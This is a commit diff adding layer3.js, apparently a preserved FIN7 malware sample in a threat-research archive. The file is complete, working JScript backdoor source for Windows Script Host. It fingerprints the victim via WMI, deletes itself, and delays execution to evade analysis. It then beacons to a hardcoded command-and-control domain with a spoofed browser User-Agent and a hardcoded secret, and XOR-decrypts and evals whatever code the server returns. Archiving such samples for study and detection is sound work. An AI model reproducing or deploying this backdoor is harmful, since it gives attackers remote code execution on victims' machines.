Create layer3.js

cybercriminal groups/FIN7/2021-08-24/code/layer3.js

@@ -0,0 +1,137 @@
+function func_start_delay () {
+	var s_WScript = WScript;
+	s_WScript.Sleep(120000);
+}
+function func_crypt_controller (var_type, var_request) {
+	try{
+		var encryption_key = "";
+		if(var_type === "decrypt") {
+			var_request = unescape(var_request);
+			var request_split = var_request.split("&_&");
+			var_request = request_split[0];
+			if (request_split.length == 2) {
+				encryption_key = request_split[1].split("");
+			}else{
+				return var_request;
+			}
+		}else{
+			encryption_key = (Math.floor(Math.random()*9000) + 1000).toString().split("");
+			var_request=unescape(encodeURIComponent(var_request));
+		}
+		var var_output = new Array(var_request.length);
+		for (var i_counter = 0; i_counter < var_request.length; i_counter++) {
+			var var_charCode = var_request.charCodeAt(i_counter) ^ encryption_key[i_counter % encryption_key.length].charCodeAt(0);
+			var_output[i_counter] = String.fromCharCode(var_charCode);
+		}
+		var result_string = var_output.join("");
+		if(var_type === "encrypt") {
+			result_string = result_string + "&_&" + encryption_key.join("");
+			result_string = escape(result_string);
+		}
+		return result_string;
+    }catch(e) {
+        return "no";
+    }
+}
+function func_id () {
+	var mac_address = "#Error#";
+	var dns_hostname = "#Error#";
+	try{
+		var lrequest = wmi.ExecQuery("select * from Win32_NetworkAdapterConfiguration where ipenabled = true");
+		var lItems = new Enumerator(lrequest);
+		for (; !lItems.atEnd(); lItems.moveNext()) {
+			mac_address = lItems.item().macaddress;
+			dns_hostname = lItems.item().DNSHostName;
+			if(typeof mac_address === "string" && mac_address.length > 1) {
+				if(typeof dns_hostname !== "string" && dns_hostname.length < 1) {
+					dns_hostname = "Unknown";
+				}else{
+					for (var i_counter = 0; i_counter < dns_hostname.length; i_counter++) {
+						if (dns_hostname.charAt(i_counter) > "z") {
+							dns_hostname = dns_hostname.substr(0, i_counter) + "_" + dns_hostname.substr(i_counter + 1);
+						}
+					}
+				}
+				return mac_address + "_" + dns_hostname;
+			}
+		}
+	}catch(e) {
+        return mac_address + "_" + dns_hostname;
+    }
+}
+function func_main () {
+    var ncommand = "";
+	var s_WScript = WScript;
+    ncommand = send_data("request", "page_id=new", true);
+    if(ncommand !== "no") {
+		try {
+			ncommand = func_crypt_controller("decrypt", ncommand);
+			if(ncommand !== "no") {
+				eval(func_crypt_controller("decrypt", ncommand));
+			}
+        }catch(e) {
+        }
+    }
+    var random_knock = 120000 + (Math.floor(Math.random() * 16001) - 5000);
+    s_WScript.Sleep(random_knock);
+    func_main();
+}
+function func_get_path () {
+    var var_pathes = ["images", "pictures", "img", "info", "new"];
+    var var_files = ["sync", "show", "hide", "add", "new", "renew", "delete"];
+    var var_path = var_pathes[Math.floor(Math.random() * var_pathes.length)] + "/" + var_files[Math.floor(Math.random() * var_files.length)];
+    return "https://civilizationidium.com/" + var_path;
+}
+var wmi = GetObject("winmgmts:root/CIMV2");
+var shell = new ActiveXObject("WScript.Shell");
+var fso = new ActiveXObject("Scripting.FileSystemObject");
+var app_path = shell.expandEnvironmentStrings("%APPDATA%");
+var uniq_id = new Date().getUTCMilliseconds();
+if(fso.GetAbsolutePathName(fso.GetParentFolderName(app_path)).indexOf("AppData") > 5) {
+    if(WScript.ScriptFullName.indexOf("Microsoft"+String.fromCharCode(0x5C)+"Windows")<0){
+		 try{
+			 fso.deleteFile(WScript.ScriptFullName);
+		 }catch(e) {}
+    }
+    try{
+        func_start_delay ();
+        func_main();
+    }catch(e) {
+        func_main();
+    }
+}
+function send_data (var_type, var_data, var_crypt) {
+    try {
+        var http_object = new ActiveXObject("MSXML2.ServerXMLHTTP");
+        if(var_type === "request") {
+            http_object.open("POST", func_get_path () + "?type=name", false);
+            var_data = "zawgkveuwynyjvizs=" + func_crypt_controller("encrypt", "group=sp&rt=0&secret=HiyFIYF973IYFCviyv&time=120000&uid=" + uniq_id + "&id=" + func_id() + "&" + var_data);
+        }else{
+            http_object.open("POST", func_get_path () + "?type=content&id=" + uniq_id, false);
+            if(var_crypt) {
+                var_data = func_crypt_controller("encrypt", var_data);
+            }
+        }
+        http_object.setRequestHeader("User-Agent", "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:69.0) Gecko/20100101 Firefox/50.0");
+        http_object.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
+        http_object.setOption(2, 13056);
+        http_object.send(var_data);
+        return http_object.responseText;
+    }catch(e) {
+        return "no";
+    }
+}
+function func_decrypt(strInpit) {
+	strPass = {redacted}
+	var strRet=new String("");
+	var arrtext = strInpit.split(",");
+	var i_counter=0;var j_counter=0;
+	for(i_counter=0;i_counter<arrtext.length-1;i_counter++) {
+		var char_c=String.fromCharCode(Number(arrtext[i_counter]));
+		var charCom=char_c.charCodeAt(0)^strPass.charCodeAt(j_counter);
+		char_c=String.fromCharCode(charCom);
+		strRet+= char_c;
+		if(j_counter==strPass.length-1)j_counter=0; else j_counter++;
+	}
+	return strRet;
+}